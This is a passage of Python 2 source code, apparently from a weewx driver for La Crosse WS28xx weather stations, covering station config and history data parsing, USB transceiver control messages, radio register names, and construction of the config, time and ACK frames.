        logdbg('ResetMinMaxFlags=     %06x (Output only)' % self._ResetMinMaxFlags) 

    def asDict(self):
        return {
            'checksum_in': self._InBufCS,
            'checksum_out': self._OutBufCS,
            'format_clock': self._ClockMode,
            'format_temperature': self._TemperatureFormat,
            'format_pressure': self._PressureFormat,
            'format_rain': self._RainFormat,
            'format_windspeed': self._WindspeedFormat,
            'threshold_weather': self._WeatherThreshold,
            'threshold_storm': self._StormThreshold,
            'lcd_contrast': self._LCDContrast,
            'low_battery_flags': self._LowBatFlags,
            'alarm_flags_wind_dir': self._WindDirAlarmFlags,
            'alarm_flags_other': self._OtherAlarmFlags,
#            'reset_minmax_flags': self._ResetMinMaxFlags,
            'history_interval': self._HistoryInterval,
            'indoor_temp_min': self._TempIndoorMinMax._Min._Value,
            'indoor_temp_min_time': self._TempIndoorMinMax._Min._Time,
            'indoor_temp_max': self._TempIndoorMinMax._Max._Value,
            'indoor_temp_max_time': self._TempIndoorMinMax._Max._Time,
            'indoor_humidity_min': self._HumidityIndoorMinMax._Min._Value,
            'indoor_humidity_min_time': self._HumidityIndoorMinMax._Min._Time,
            'indoor_humidity_max': self._HumidityIndoorMinMax._Max._Value,
            'indoor_humidity_max_time': self._HumidityIndoorMinMax._Max._Time,
            'outdoor_temp_min': self._TempOutdoorMinMax._Min._Value,
            'outdoor_temp_min_time': self._TempOutdoorMinMax._Min._Time,
            'outdoor_temp_max': self._TempOutdoorMinMax._Max._Value,
            'outdoor_temp_max_time': self._TempOutdoorMinMax._Max._Time,
            'outdoor_humidity_min': self._HumidityOutdoorMinMax._Min._Value,
            'outdoor_humidity_min_time':self._HumidityOutdoorMinMax._Min._Time,
            'outdoor_humidity_max': self._HumidityOutdoorMinMax._Max._Value,
            'outdoor_humidity_max_time':self._HumidityOutdoorMinMax._Max._Time,
            'rain_24h_max': self._Rain24HMax._Max._Value,
            'rain_24h_max_time': self._Rain24HMax._Max._Time,
            'wind_gust_max': self._GustMax._Max._Value,
            'wind_gust_max_time': self._GustMax._Max._Time,
            'pressure_min': self._PressureRelative_hPaMinMax._Min._Value,
            'pressure_min_time': self._PressureRelative_hPaMinMax._Min._Time,
            'pressure_max': self._PressureRelative_hPaMinMax._Max._Value,
            'pressure_max_time': self._PressureRelative_hPaMinMax._Max._Time
            # do not bother with pressure inHg
            }


class CHistoryData(object):

    def __init__(self):
        self.Time = None
        self.TempIndoor = CWeatherTraits.TemperatureNP()
        self.HumidityIndoor = CWeatherTraits.HumidityNP()
        self.TempOutdoor = CWeatherTraits.TemperatureNP()
        self.HumidityOutdoor = CWeatherTraits.HumidityNP()
        self.PressureRelative = None
        self.RainCounterRaw = 0
        self.WindSpeed = CWeatherTraits.WindNP()
        self.WindDirection = EWindDirection.wdNone
        self.Gust = CWeatherTraits.WindNP()
        self.GustDirection = EWindDirection.wdNone

    def read(self, buf):
        nbuf = [0]
        nbuf[0] = buf[0]
        self.Gust = USBHardware.toWindspeed_3_1(nbuf, 12, 0)
        self.GustDirection = (nbuf[0][14] >> 4) & 0xF
        self.WindSpeed = USBHardware.toWindspeed_3_1(nbuf, 14, 0)
        self.WindDirection = (nbuf[0][14] >> 4) & 0xF
        self.RainCounterRaw = USBHardware.toRain_3_1(nbuf, 16, 1)
        self.HumidityOutdoor = USBHardware.toHumidity_2_0(nbuf, 17, 0)
        self.HumidityIndoor = USBHardware.toHumidity_2_0(nbuf, 18, 0)    
        self.PressureRelative = USBHardware.toPressure_hPa_5_1(nbuf, 19, 0)
        self.TempIndoor = USBHardware.toTemperature_3_1(nbuf, 23, 0)
        self.TempOutdoor = USBHardware.toTemperature_3_1(nbuf, 22, 1)
        self.Time = USBHardware.toDateTime(nbuf, 25, 1, 'HistoryData')

    def toLog(self):
        """emit raw historical data"""
        logdbg("Time              %s"    % self.Time)
        logdbg("TempIndoor=       %7.1f" % self.TempIndoor)
        logdbg("HumidityIndoor=   %7.0f" % self.HumidityIndoor)
        logdbg("TempOutdoor=      %7.1f" % self.TempOutdoor)
        logdbg("HumidityOutdoor=  %7.0f" % self.HumidityOutdoor)
        logdbg("PressureRelative= %7.1f" % self.PressureRelative)
        logdbg("RainCounterRaw=   %7.3f" % self.RainCounterRaw)
        logdbg("WindSpeed=        %7.3f" % self.WindSpeed)
        logdbg("WindDirection=    % 3s" % CWeatherTraits.windDirMap[self.WindDirection])
        logdbg("Gust=             %7.3f" % self.Gust)
        logdbg("GustDirection=    % 3s" % CWeatherTraits.windDirMap[self.GustDirection])

    def asDict(self):
        """emit historical data as a dict with weewx conventions"""
        return {
            'dateTime': tstr_to_ts(str(self.Time)),
            'inTemp': self.TempIndoor,
            'inHumidity': self.HumidityIndoor,
            'outTemp': self.TempOutdoor,
            'outHumidity': self.HumidityOutdoor,
            'pressure': self.PressureRelative,
            'rain': self.RainCounterRaw / 10,  # weewx wants cm
            'windSpeed': self.WindSpeed,
            'windDir': getWindDir(self.WindDirection, self.WindSpeed),
            'windGust': self.Gust,
            'windGustDir': getWindDir(self.GustDirection, self.Gust),
            }

class HistoryCache:
    def __init__(self):
        self.clear_records()
    def clear_records(self):
        self.since_ts = 0
        self.num_rec = 0
        self.start_index = None
        self.next_index = None
        self.records = []
        self.num_outstanding_records = None
        self.num_scanned = 0
        self.last_ts = 0

class CDataStore(object):

    class TTransceiverSettings(object): 
        def __init__(self):
            self.VendorId       = 0x6666
            self.ProductId      = 0x5555
            self.VersionNo      = 1
            self.manufacturer   = "LA CROSSE TECHNOLOGY"
            self.product        = "Weather Direct Light Wireless Device"
            self.FrequencyStandard = EFrequency.fsUS
            self.Frequency      = getFrequency(self.FrequencyStandard)
            self.SerialNumber   = None
            self.DeviceID       = None

    class TLastStat(object):
        def __init__(self):
            self.LastBatteryStatus = None
            self.LastLinkQuality = None
            self.LastHistoryIndex = None
            self.LatestHistoryIndex = None
            self.last_seen_ts = None
            self.last_weather_ts = 0
            self.last_history_ts = 0
            self.last_config_ts = 0

    def __init__(self):
        self.transceiverPresent = False
        self.commModeInterval = 3
        self.registeredDeviceID = None
        self.LastStat = CDataStore.TLastStat()
        self.TransceiverSettings = CDataStore.TTransceiverSettings()
        self.StationConfig = CWeatherStationConfig()
        self.CurrentWeather = CCurrentWeatherData()

    def getFrequencyStandard(self):
        return self.TransceiverSettings.FrequencyStandard

    def setFrequencyStandard(self, val):
        logdbg('setFrequency: %s' % val)
        self.TransceiverSettings.FrequencyStandard = val
        self.TransceiverSettings.Frequency = getFrequency(val)

    def getDeviceID(self):
        return self.TransceiverSettings.DeviceID

    def setDeviceID(self,val):
        logdbg("setDeviceID: %04x" % val)
        self.TransceiverSettings.DeviceID = val

    def getRegisteredDeviceID(self):
        return self.registeredDeviceID

    def setRegisteredDeviceID(self, val):
        if val != self.registeredDeviceID:
            loginf("console is paired to device with ID %04x" % val)
        self.registeredDeviceID = val

    def getTransceiverPresent(self):
        return self.transceiverPresent

    def setTransceiverPresent(self, val):
        self.transceiverPresent = val

    def setLastStatCache(self, seen_ts=None,
                         quality=None, battery=None,
                         weather_ts=None,
                         history_ts=None,
                         config_ts=None):
        if DEBUG_COMM > 1:
            logdbg('setLastStatCache: seen=%s quality=%s battery=%s weather=%s history=%s config=%s' %
                   (seen_ts, quality, battery, weather_ts, history_ts, config_ts))
        if seen_ts is not None:
            self.LastStat.last_seen_ts = seen_ts
        if quality is not None:
            self.LastStat.LastLinkQuality = quality
        if battery is not None:
            self.LastStat.LastBatteryStatus = battery
        if weather_ts is not None:
            self.LastStat.last_weather_ts = weather_ts
        if history_ts is not None:
            self.LastStat.last_history_ts = history_ts
        if config_ts is not None:
            self.LastStat.last_config_ts = config_ts

    def setLastHistoryIndex(self,val):
        self.LastStat.LastHistoryIndex = val

    def getLastHistoryIndex(self):
        return self.LastStat.LastHistoryIndex

    def setLatestHistoryIndex(self,val):
        self.LastStat.LatestHistoryIndex = val

    def getLatestHistoryIndex(self):
        return self.LastStat.LatestHistoryIndex

    def setCurrentWeather(self, data):
        self.CurrentWeather = data

    def getDeviceRegistered(self):
        if ( self.registeredDeviceID is None
             or self.TransceiverSettings.DeviceID is None
             or self.registeredDeviceID != self.TransceiverSettings.DeviceID ):
            return False
        return True

    def getCommModeInterval(self):
        return self.commModeInterval

    def setCommModeInterval(self,val):
        logdbg("setCommModeInterval to %x" % val)
        self.commModeInterval = val

    def setTransceiverSerNo(self,val):
        logdbg("setTransceiverSerialNumber to %s" % val)
        self.TransceiverSettings.SerialNumber = val

    def getTransceiverSerNo(self):
        return self.TransceiverSettings.SerialNumber


class sHID(object):
    """USB driver abstraction"""

    def __init__(self):
        self.devh = None
        self.timeout = 1000
        self.last_dump = None

    def open(self, vid, pid, did, serial):
        device = self._find_device(vid, pid, did, serial)
        if device is None:
            logcrt('Cannot find USB device with Vendor=0x%04x ProdID=0x%04x Device=%s Serial=%s' % (vid, pid, did, serial))
            raise weewx.WeeWxIOError('Unable to find transceiver on USB')
        self._open_device(device)

    def close(self):
        self._close_device()

    def _find_device(self, vid, pid, did, serial):
        for bus in usb.busses():
            for dev in bus.devices:
                if dev.idVendor == vid and dev.idProduct == pid:
                    if did is None or dev.filename == did:
                        if serial is None:
                            loginf('found transceiver at bus=%s device=%s' %
                                   (bus.dirname, dev.filename))
                            return dev
                        else:
                            handle = dev.open()
                            try:
                                buf = self.readCfg(handle, 0x1F9, 7)
                                sn  = str("%02d" % (buf[0]))
                                sn += str("%02d" % (buf[1]))
                                sn += str("%02d" % (buf[2]))
                                sn += str("%02d" % (buf[3]))
                                sn += str("%02d" % (buf[4]))
                                sn += str("%02d" % (buf[5]))
                                sn += str("%02d" % (buf[6]))
                                if str(serial) == sn:
                                    loginf('found transceiver at bus=%s device=%s serial=%s' % (bus.dirname, dev.filename, sn))
                                    return dev
                                else:
                                    loginf('skipping transceiver with serial %s (looking for %s)' % (sn, serial))
                            finally:
                                del handle
        return None

    def _open_device(self, dev, interface=0):
        self.devh = dev.open()
        if not self.devh:
            raise weewx.WeeWxIOError('Open USB device failed')

        loginf('manufacturer: %s' % self.devh.getString(dev.iManufacturer,30))
        loginf('product: %s' % self.devh.getString(dev.iProduct,30))
        loginf('interface: %d' % interface)

        # be sure kernel does not claim the interface
        try:
            self.devh.detachKernelDriver(interface)
        except Exception:
            pass

        # attempt to claim the interface
        try:
            logdbg('claiming USB interface %d' % interface)
            self.devh.claimInterface(interface)
            self.devh.setAltInterface(interface)
        except usb.USBError, e:
            self._close_device()
            logcrt('Unable to claim USB interface %s: %s' % (interface, e))
            raise weewx.WeeWxIOError(e)

        # FIXME: this seems to be specific to ws28xx?
        # FIXME: check return values
        usbWait = 0.05
        self.devh.getDescriptor(0x1, 0, 0x12)
        time.sleep(usbWait)
        self.devh.getDescriptor(0x2, 0, 0x9)
        time.sleep(usbWait)
        self.devh.getDescriptor(0x2, 0, 0x22)
        time.sleep(usbWait)
        self.devh.controlMsg(usb.TYPE_CLASS + usb.RECIP_INTERFACE,
                             0xa, [], 0x0, 0x0, 1000)
        time.sleep(usbWait)
        self.devh.getDescriptor(0x22, 0, 0x2a9)
        time.sleep(usbWait)

    def _close_device(self):
        try:
            logdbg('releasing USB interface')
            self.devh.releaseInterface()
        except Exception:
            pass
        self.devh = None

    def setTX(self):
        buf = [0]*0x15
        buf[0] = 0xD1
        if DEBUG_COMM > 1:
            self.dump('setTX', buf, fmt=DEBUG_DUMP_FORMAT)
        self.devh.controlMsg(usb.TYPE_CLASS + usb.RECIP_INTERFACE,
                             request=0x0000009,
                             buffer=buf,
                             value=0x00003d1,
                             index=0x0000000,
                             timeout=self.timeout)

    def setRX(self):
        buf = [0]*0x15
        buf[0] = 0xD0
        if DEBUG_COMM > 1:
            self.dump('setRX', buf, fmt=DEBUG_DUMP_FORMAT)
        self.devh.controlMsg(usb.TYPE_CLASS + usb.RECIP_INTERFACE,
                             request=0x0000009,
                             buffer=buf,
                             value=0x00003d0,
                             index=0x0000000,
                             timeout=self.timeout)

    def getState(self,StateBuffer):
        buf = self.devh.controlMsg(requestType=usb.TYPE_CLASS |
                                   usb.RECIP_INTERFACE | usb.ENDPOINT_IN,
                                   request=usb.REQ_CLEAR_FEATURE,
                                   buffer=0x0a,
                                   value=0x00003de,
                                   index=0x0000000,
                                   timeout=self.timeout)
        if DEBUG_COMM > 1:
            self.dump('getState', buf, fmt=DEBUG_DUMP_FORMAT)
        StateBuffer[0]=[0]*0x2
        StateBuffer[0][0]=buf[1]
        StateBuffer[0][1]=buf[2]

    def readConfigFlash(self, addr, numBytes, data):
        if numBytes > 512:
            raise Exception('bad number of bytes')

        while numBytes:
            buf=[0xcc]*0x0f #0x15
            buf[0] = 0xdd
            buf[1] = 0x0a
            buf[2] = (addr >>8) & 0xFF
            buf[3] = (addr >>0) & 0xFF
            if DEBUG_COMM > 1:
                self.dump('readCfgFlash>', buf, fmt=DEBUG_DUMP_FORMAT)
            self.devh.controlMsg(usb.TYPE_CLASS + usb.RECIP_INTERFACE,
                                 request=0x0000009,
                                 buffer=buf,
                                 value=0x00003dd,
                                 index=0x0000000,
                                 timeout=self.timeout)
            buf = self.devh.controlMsg(requestType=usb.TYPE_CLASS |
                                       usb.RECIP_INTERFACE |
                                       usb.ENDPOINT_IN,
                                       request=usb.REQ_CLEAR_FEATURE,
                                       buffer=0x15,
                                       value=0x00003dc,
                                       index=0x0000000,
                                       timeout=self.timeout)
            new_data=[0]*0x15
            if numBytes < 16:
                for i in xrange(0, numBytes):
                    new_data[i] = buf[i+4]
                numBytes = 0
            else:
                for i in xrange(0, 16):
                    new_data[i] = buf[i+4]
                numBytes -= 16
                addr += 16
            if DEBUG_COMM > 1:
                self.dump('readCfgFlash<', buf, fmt=DEBUG_DUMP_FORMAT)
        data[0] = new_data # FIXME: new_data might be unset

    def setState(self,state):
        buf = [0]*0x15
        buf[0] = 0xd7
        buf[1] = state
        if DEBUG_COMM > 1:
            self.dump('setState', buf, fmt=DEBUG_DUMP_FORMAT)
        self.devh.controlMsg(usb.TYPE_CLASS + usb.RECIP_INTERFACE,
                             request=0x0000009,
                             buffer=buf,
                             value=0x00003d7,
                             index=0x0000000,
                             timeout=self.timeout)

    def setFrame(self,data,numBytes):
        buf = [0]*0x111
        buf[0] = 0xd5
        buf[1] = numBytes >> 8
        buf[2] = numBytes
        for i in xrange(0, numBytes):
            buf[i+3] = data[i]
        if DEBUG_COMM == 1:
            self.dump('setFrame', buf, 'short')
        elif DEBUG_COMM > 1:
            self.dump('setFrame', buf, fmt=DEBUG_DUMP_FORMAT)
        self.devh.controlMsg(usb.TYPE_CLASS + usb.RECIP_INTERFACE,
                             request=0x0000009,
                             buffer=buf,
                             value=0x00003d5,
                             index=0x0000000,
                             timeout=self.timeout)

    def getFrame(self,data,numBytes):
        buf = self.devh.controlMsg(requestType=usb.TYPE_CLASS |
                                   usb.RECIP_INTERFACE |
                                   usb.ENDPOINT_IN,
                                   request=usb.REQ_CLEAR_FEATURE,
                                   buffer=0x111,
                                   value=0x00003d6,
                                   index=0x0000000,
                                   timeout=self.timeout)
        new_data=[0]*0x131
        new_numBytes=(buf[1] << 8 | buf[2])& 0x1ff
        for i in xrange(0, new_numBytes):
            new_data[i] = buf[i+3]
        if DEBUG_COMM == 1:
            self.dump('getFrame', buf, 'short')
        elif DEBUG_COMM > 1:
            self.dump('getFrame', buf, fmt=DEBUG_DUMP_FORMAT)
        data[0] = new_data
        numBytes[0] = new_numBytes

    def writeReg(self,regAddr,data):
        buf = [0]*0x05
        buf[0] = 0xf0
        buf[1] = regAddr & 0x7F
        buf[2] = 0x01
        buf[3] = data
        buf[4] = 0x00
        if DEBUG_COMM > 1:
            self.dump('writeReg', buf, fmt=DEBUG_DUMP_FORMAT)
        self.devh.controlMsg(usb.TYPE_CLASS + usb.RECIP_INTERFACE,
                             request=0x0000009,
                             buffer=buf,
                             value=0x00003f0,
                             index=0x0000000,
                             timeout=self.timeout)

    def execute(self, command):
        buf = [0]*0x0f #*0x15
        buf[0] = 0xd9
        buf[1] = command
        if DEBUG_COMM > 1:
            self.dump('execute', buf, fmt=DEBUG_DUMP_FORMAT)
        self.devh.controlMsg(usb.TYPE_CLASS + usb.RECIP_INTERFACE,
                             request=0x0000009,
                             buffer=buf,
                             value=0x00003d9,
                             index=0x0000000,
                             timeout=self.timeout)

    def setPreamblePattern(self,pattern):
        buf = [0]*0x15
        buf[0] = 0xd8
        buf[1] = pattern
        if DEBUG_COMM > 1:
            self.dump('setPreamble', buf, fmt=DEBUG_DUMP_FORMAT)
        self.devh.controlMsg(usb.TYPE_CLASS + usb.RECIP_INTERFACE,
                             request=0x0000009,
                             buffer=buf,
                             value=0x00003d8,
                             index=0x0000000,
                             timeout=self.timeout)

    # three formats, long, short, auto.  short shows only the first 16 bytes.
    # long shows the full length of the buffer.  auto shows the message length
    # as indicated by the length in the message itself for setFrame and
    # getFrame, or the first 16 bytes for any other message.
    def dump(self, cmd, buf, fmt='auto'):
        strbuf = ''
        msglen = None
        if fmt == 'auto':
            if buf[0] in [0xd5, 0x00]:
                msglen = buf[2] + 3        # use msg length for set/get frame
            else:
                msglen = 16                # otherwise do same as short format
        elif fmt == 'short':
            msglen = 16
        for i,x in enumerate(buf):
            strbuf += str('%02x ' % x)
            if (i+1) % 16 == 0:
                self.dumpstr(cmd, strbuf)
                strbuf = ''
            if msglen is not None and i+1 >= msglen:
                break
        if strbuf:
            self.dumpstr(cmd, strbuf)

    # filter output that we do not care about, pad the command string.
    def dumpstr(self, cmd, strbuf):
        pad = ' ' * (15-len(cmd))
        # de15 is idle, de14 is intermediate
        if strbuf in ['de 15 00 00 00 00 ','de 14 00 00 00 00 ']:
            if strbuf != self.last_dump or DEBUG_COMM > 2:
                logdbg('%s: %s%s' % (cmd, pad, strbuf))
            self.last_dump = strbuf
        else:
            logdbg('%s: %s%s' % (cmd, pad, strbuf))
            self.last_dump = None

    def readCfg(self, handle, addr, numBytes):
        while numBytes:
            buf=[0xcc]*0x0f #0x15
            buf[0] = 0xdd
            buf[1] = 0x0a
            buf[2] = (addr >>8) & 0xFF
            buf[3] = (addr >>0) & 0xFF
            handle.controlMsg(usb.TYPE_CLASS + usb.RECIP_INTERFACE,
                              request=0x0000009,
                              buffer=buf,
                              value=0x00003dd,
                              index=0x0000000,
                              timeout=1000)
            buf = handle.controlMsg(requestType=usb.TYPE_CLASS |
                                    usb.RECIP_INTERFACE | usb.ENDPOINT_IN,
                                    request=usb.REQ_CLEAR_FEATURE,
                                    buffer=0x15,
                                    value=0x00003dc,
                                    index=0x0000000,
                                    timeout=1000)
            new_data=[0]*0x15
            if numBytes < 16:
                for i in xrange(0, numBytes):
                    new_data[i] = buf[i+4]
                numBytes = 0
            else:
                for i in xrange(0, 16):
                    new_data[i] = buf[i+4]
                numBytes -= 16
                addr += 16
        return new_data

class CCommunicationService(object):

    reg_names = dict()

    class AX5051RegisterNames:
        REVISION         = 0x0
        SCRATCH          = 0x1
        POWERMODE        = 0x2
        XTALOSC          = 0x3
        FIFOCTRL         = 0x4
        FIFODATA         = 0x5
        IRQMASK          = 0x6
        IFMODE           = 0x8
        PINCFG1          = 0x0C
        PINCFG2          = 0x0D
        MODULATION       = 0x10
        ENCODING         = 0x11
        FRAMING          = 0x12
        CRCINIT3         = 0x14
        CRCINIT2         = 0x15
        CRCINIT1         = 0x16
        CRCINIT0         = 0x17
        FREQ3            = 0x20
        FREQ2            = 0x21
        FREQ1            = 0x22
        FREQ0            = 0x23
        FSKDEV2          = 0x25
        FSKDEV1          = 0x26
        FSKDEV0          = 0x27
        IFFREQHI         = 0x28
        IFFREQLO         = 0x29
        PLLLOOP          = 0x2C
        PLLRANGING       = 0x2D
        PLLRNGCLK        = 0x2E
        TXPWR            = 0x30
        TXRATEHI         = 0x31
        TXRATEMID        = 0x32
        TXRATELO         = 0x33
        MODMISC          = 0x34
        FIFOCONTROL2     = 0x37
        ADCMISC          = 0x38
        AGCTARGET        = 0x39
        AGCATTACK        = 0x3A
        AGCDECAY         = 0x3B
        AGCCOUNTER       = 0x3C
        CICDEC           = 0x3F
        DATARATEHI       = 0x40
        DATARATELO       = 0x41
        TMGGAINHI        = 0x42
        TMGGAINLO        = 0x43
        PHASEGAIN        = 0x44
        FREQGAIN         = 0x45
        FREQGAIN2        = 0x46
        AMPLGAIN         = 0x47
        TRKFREQHI        = 0x4C
        TRKFREQLO        = 0x4D
        XTALCAP          = 0x4F
        SPAREOUT         = 0x60
        TESTOBS          = 0x68
        APEOVER          = 0x70
        TMMUX            = 0x71
        PLLVCOI          = 0x72
        PLLCPEN          = 0x73
        PLLRNGMISC       = 0x74
        AGCMANUAL        = 0x78
        ADCDCLEVEL       = 0x79
        RFMISC           = 0x7A
        TXDRIVER         = 0x7B
        REF              = 0x7C
        RXMISC           = 0x7D

    def __init__(self):
        logdbg('CCommunicationService.init')

        self.shid = sHID()
        self.DataStore = CDataStore()

        self.firstSleep = 1
        self.nextSleep = 1
        self.pollCount = 0

        self.running = False
        self.child = None
        self.thread_wait = 60.0 # seconds

        self.command = None
        self.history_cache = HistoryCache()
        # do not set time when offset to whole hour is <= _a3_offset
        self._a3_offset = 3

    def buildFirstConfigFrame(self, Buffer, cs):
        logdbg('buildFirstConfigFrame: cs=%04x' % cs)
        newBuffer = [0]
        newBuffer[0] = [0]*9
        comInt = self.DataStore.getCommModeInterval()
        historyAddress = 0xFFFFFF
        newBuffer[0][0] = 0xf0
        newBuffer[0][1] = 0xf0
        newBuffer[0][2] = EAction.aGetConfig
        newBuffer[0][3] = (cs >> 8) & 0xff
        newBuffer[0][4] = (cs >> 0) & 0xff
        newBuffer[0][5] = (comInt >> 4) & 0xff
        newBuffer[0][6] = (historyAddress >> 16) & 0x0f | 16 * (comInt & 0xf)
        newBuffer[0][7] = (historyAddress >> 8 ) & 0xff
        newBuffer[0][8] = (historyAddress >> 0 ) & 0xff
        Buffer[0] = newBuffer[0]
        Length = 0x09
        return Length

    def buildConfigFrame(self, Buffer):
        logdbg("buildConfigFrame")
        newBuffer = [0]
        newBuffer[0] = [0]*48
        cfgBuffer = [0]
        cfgBuffer[0] = [0]*44
        changed = self.DataStore.StationConfig.testConfigChanged(cfgBuffer)
        if changed:
            self.shid.dump('OutBuf', cfgBuffer[0], fmt='long')
            newBuffer[0][0] = Buffer[0][0]
            newBuffer[0][1] = Buffer[0][1]
            newBuffer[0][2] = EAction.aSendConfig # 0x40 # change this value if we won't store config
            newBuffer[0][3] = Buffer[0][3]
            for i in xrange(0,44):
                newBuffer[0][i+4] = cfgBuffer[0][i]
            Buffer[0] = newBuffer[0]
            Length = 48 # 0x30
        else: # current config not up to date; do not write yet
            Length = 0
        return Length

    def buildTimeFrame(self, Buffer, cs):
        logdbg("buildTimeFrame: cs=%04x" % cs)

        now = time.time()
        tm = time.localtime(now)

        newBuffer=[0]
        newBuffer[0]=Buffer[0]
        #00000000: d5 00 0c 00 32 c0 00 8f 45 25 15 91 31 20 01 00
        #00000000: d5 00 0c 00 32 c0 06 c1 47 25 15 91 31 20 01 00
        #                             3  4  5  6  7  8  9 10 11
        newBuffer[0][2] = EAction.aSendTime # 0xc0
        newBuffer[0][3] = (cs >> 8) & 0xFF
        newBuffer[0][4] = (cs >> 0) & 0xFF
        newBuffer[0][5] = (tm[5] % 10) + 0x10 * (tm[5] // 10) #sec
        newBuffer[0][6] = (tm[4] % 10) + 0x10 * (tm[4] // 10) #min
        newBuffer[0][7] = (tm[3] % 10) + 0x10 * (tm[3] // 10) #hour
        #DayOfWeek = tm[6] - 1; #ole from 1 - 7 - 1=Sun... 0-6 0=Sun
        DayOfWeek = tm[6]       #py  from 0 - 6 - 0=Mon
        newBuffer[0][8] = DayOfWeek % 10 + 0x10 *  (tm[2] % 10)          #DoW + Day
        newBuffer[0][9] =  (tm[2] // 10) + 0x10 *  (tm[1] % 10)          #day + month
        newBuffer[0][10] = (tm[1] // 10) + 0x10 * ((tm[0] - 2000) % 10)  #month + year
        newBuffer[0][11] = (tm[0] - 2000) // 10                          #year
        Buffer[0]=newBuffer[0]
        Length = 0x0c
        return Length

    def buildACKFrame(self, Buffer, action, cs, hidx=None):
        if DEBUG_COMM > 1:
            logdbg("buildACKFrame: action=%x cs=%04x historyIndex=%s" %
                   (action, cs, hidx))
        newBuffer = [0]
        newBuffer[0] = [0]*9
        for i in xrange(0,2):
            newBuffer[0][i] = Buffer[0][i]

        comInt = self.DataStore.getCommModeInterval()

        # When last weather is stale, change action to get current weather
        # This is only needed during long periods of history data catchup
        if self.command == EAction.aGetHistory:
            now = int(time.time())
            age = now - self.DataStore.LastStat.last_weather_ts
            # Morphing action only with GetHistory requests, 
            # and stale data after a period of twice the CommModeInterval,
            # but not with init GetHistory requests (0xF0)
            if action == EAction.aGetHistory and age >= (comInt +1) * 2 and newBuffer[0][1] != 0xF0:
                if DEBUG_COMM > 0:
                    logdbg('buildACKFrame: morphing action from %d to 5 (age=%s)' % (action, age))
                action = EAction.aGetCurrent

        if hidx is None:
            if self.command == EAction.aGetHistory:
                hidx = self.history_cache.next_index
            elif self.DataStore.getLastHistoryIndex() is not None:
                hidx = self.DataStore.getLastHistoryIndex()
        if hidx is None or hidx < 0 or hidx >= WS28xxDriver.max_records:
            haddr = 0xffffff
        else:
            haddr = index_to_addr(hidx)
        if DEBUG_COMM > 1:
            logdbg('buildACKFrame: idx: %s addr: 0x%04x' % (hidx, haddr))

        newBuffer[0][2] = action & 0xF
        newBuffer[0][3] = (cs >> 8) & 0xFF
        newBuffer[0][4] = (cs >> 0) & 0xFF
        newBuffer[0][5] = (comInt >> 4) & 0xFF
        newBuffer[0][6] = (haddr >> 16) & 0x0F | 16 * (comInt & 0xF)
        newBuffer[0][7] = (haddr >> 8 ) & 0xFF
        newBuffer[0][8] = (haddr >> 0 ) & 0xFF

        #d5 00 09 f0 f0 03 00 32 00 3f ff ff
        Buffer[0]=newBuffer[0]
        return 9

    def handleWsAck(self,Buffer,Length):
        logdbg('handleWsAck')
        self.DataStore.setLastStatCache(seen_ts=int(time.time()),
                                        quality=(Buffer[0][3] & 0x7f), 
                                        battery=(Buffer[0][2] & 0xf))

    def handleConfig(self,Buffer,Length):
        logdbg('handleConfig: %s' % self.timing())
        if DEBUG_CONFIG_DATA > 2:
            self.shid.dump('InBuf', Buffer[0], fmt='long')
        newBuffer=[0]
        newBuffer[0] = Buffer[0]
        newLength = [0]
        now = int(time.time())
        self.DataStore.StationConfig.read(newBuffer)
        if DEBUG_CONFIG_DATA > 1:
            self.DataStore.StationConfig.toLog()
        self.DataStore.setLastStatCache(seen_ts=now,
                                        quality=(Buffer[0][3] & 0x7f), 
                                        battery=(Buffer[0][2] & 0xf),
                                        config_ts=now)
        cs = newBuffer[0][47] | (newBuffer[0][46] << 8)
        self.setSleep(0.300,0.010)
        newLength[0] = self.buildACKFrame(newBuffer, EAction.aGetHistory, cs)

        Buffer[0] = newBuffer[0]
        Length[0] = newLength[0]

    def handleCurrentData(self,Buffer,Length):
        if DEBUG_WEATHER_DATA > 0:
            logdbg('handleCurrentData: %s' % self.timing())

        now = int(time.time())

        # update the weather data cache if changed or stale
        chksum = CCurrentWeatherData.calcChecksum(Buffer)
        age = now - self.DataStore.LastStat.last_weather_ts
        if age >= 10 or chksum != self.DataStore.CurrentWeather.checksum():
            if DEBUG_WEATHER_DATA > 2:
                self.shid.dump('CurWea', Buffer[0], fmt='long')
            data = CCurrentWeatherData()
            data.read(Buffer)
            self.DataStore.setCurrentWeather(data)
            if DEBUG_WEATHER_DATA > 1:
                data.toLog()

        # update the connection cache
        self.DataStore.setLastStatCache(seen_ts=now,
                                        quality=(Buffer[0][3] & 0x7f), 
                                        battery=(Buffer[0][2] & 0xf),
                                        weather_ts=now)

        newBuffer = [0]
        newBuffer[0] = Buffer[0]
        newLength = [0]

        cs = newBuffer[0][5] | (newBuffer[0][4] << 8)

        cfgBuffer = [0]
        cfgBuffer[0] = [0]*44
        changed = self.DataStore.StationConfig.testConfigChanged(cfgBuffer)
        inBufCS = self.DataStore.StationConfig.getInBufCS()
        if inBufCS == 0 or inBufCS != cs:
            # request for a get config
            logdbg('handleCurrentData: inBufCS of station does not match')
            self.setSleep(0.300,0.010)
            newLength[0] = self.buildACKFrame(newBuffer, EAction.aGetConfig, cs)
        elif changed:
            # Request for a set config
            logdbg('handleCurrentData: outBufCS of station changed')
            self.setSleep(0.300,0.010)
            newLength[0] = self.buildACKFrame(newBuffer, EAction.aReqSetConfig, cs)
        else:
            # Request for either a history message or a current weather message
            # In general we don't use EAction.aGetCurrent to ask for a current
            # weather  message; they also come when requested for
            # EAction.aGetHistory. This we learned from the Heavy Weather Pro
            # messages (via USB sniffer).
            self.setSleep(0.300,0.010)
            newLength[0] = self.buildACKFrame(newBuffer, EAction.aGetHistory, cs)

        Length[0] = newLength[0]
        Buffer[0] = newBuffer[0]

    def handleHistoryData(self, buf, buflen):
        if DEBUG_HISTORY_DATA > 0:
            logdbg('handleHistoryData: %s' % self.timing())

        now = int(time.time())
        self.DataStore.setLastStatCache(seen_ts=now,
                                        quality=(buf[0][3] & 0x7f),
                                        battery=(buf[0][2] & 0xf),
                                        history_ts=now)

        newbuf = [0]
        newbuf[0] = buf[0]
        newlen = [0]
        data = CHistoryData()
        data.read(newbuf)
        if DEBUG_HISTORY_DATA > 1:
            data.toLog()

        cs = newbuf[0][5] | (newbuf[0][4] << 8)
        latestAddr = bytes_to_addr(buf[0][6], buf[0][7], buf[0][8])
        thisAddr = bytes_to_addr(buf[0][9], buf[0][10], buf[0][11])
        latestIndex = addr_to_index(latestAddr)
        thisIndex = addr_to_index(thisAddr)
        ts = tstr_to_ts(str(data.Time))

        nrec = get_index(latestIndex - thisIndex)
        logdbg('handleHistoryData: time=%s'
